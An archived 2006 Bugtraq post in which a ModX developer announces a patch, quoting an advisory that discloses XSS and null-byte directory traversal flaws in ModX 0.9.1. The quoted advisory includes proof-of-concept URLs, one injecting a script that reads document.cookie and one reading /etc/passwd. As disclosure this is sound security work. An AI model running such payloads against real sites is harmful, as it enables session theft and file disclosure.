lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Sat, 15 Apr 2006 12:37:19 -0500
From: Victor Brilon <victor@...torland.com>
To: crasher@...oak.or.id
Cc: bugtraq@...urityfocus.com
Subject: Re: Vulnerabilities in MOD


The ModX development released a patch for these bugs this morning.  
More information available at:
http://modxcms.com/forums/index.php/topic,3982.0.html

While we greatly appreciate the efforts of cR45H3R in finding these  
bugs in our code, we'd also appreciate a courtesy email to the dev  
team before vulnerabilities like these are made public.

Victor
(on behalf of the ModX dev team)

On Apr 14, 2006, at 1:53 AM, crasher@...oak.or.id wrote:

>
>  k  k         kkkk kk   kkkk  k  k  kkkkkk kkkkkk    kkkk   k     
> k   k   k  k
>  k k         k   k  k  k   k  k k     kk   k     k  k    k  kk    
> k   k   k k
>  kk   <><>   kkkkk  k  kkkkk  kk      kk   kkkkkk   k    k  k k   
> k   k   kk
>  k k         k      k  k      k k     kk   k   k    k    k  k  k  
> k   k   k k
>  k  k         kkkk  kk  kkkk  k  k    kk   k    k    kkkk   k    
> kk   k   k  k
>
> ]=- Vulnerabilities in ModX
>
>  Author   : Rusydi Hasan M
>  a.k.a    : cR45H3R
>  Date     : April,13th 2006
>  Location : Indonesia, Cilacap
>
>
> ]=- Software description
>
>  Version : 0.9.1
>  URL     : http://modxcms.com
>
>
> ]=- the bugs
>
> 1. XSS || [C]ross [S]ite [S]cripting
> 2. Reverse Directory Transversal with NULL injection
>
>
> ]=- PoC
>
> [1] XSS
>
>  http://[victim]/[modx_dir]/index.php?id=[parameter][XSS_here]
>
>  E[x]ample :
>
>  http://127.0.0.1/modx/index.php?id=2%3Cscript%3Ealert 
> (document.cookie)%3C/script%3E
>
> [2] Reverse directory Transversal + NULL injection
>
>  http://[victim]/[modx_dir]/index.php?id=[parameter] 
> [reverse_derectory]%00
>
>  E[x]ample :
>
>  http://127.0.0.1/modx/index.php?id=1/../../../../../../../etc/ 
> passwd%00
>
>  PHP error debug
>   Error:
>
> fopen(/var/www/html/modx/assets/cache/docid_1/../../../../../../../ 
> etc/passwd\0.pageCache.php
>   ): failed to open stream: Permission denied
>
>
> ]=- Vendor
>
>  Not contact
>
>
> ]=- Shoutz
>
> #  
> fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,deg 
> leng,etc
> # y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32,  
> anonymous, the
> day
> # ph03n1x,ghoz,spyoff,slackX,r34d3r,xnuxer,sakitjiwa,m_beben
>
>
> ]=- Contact
>
>  crasher@...oak.or.id || http://kecoak.or.id
>
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ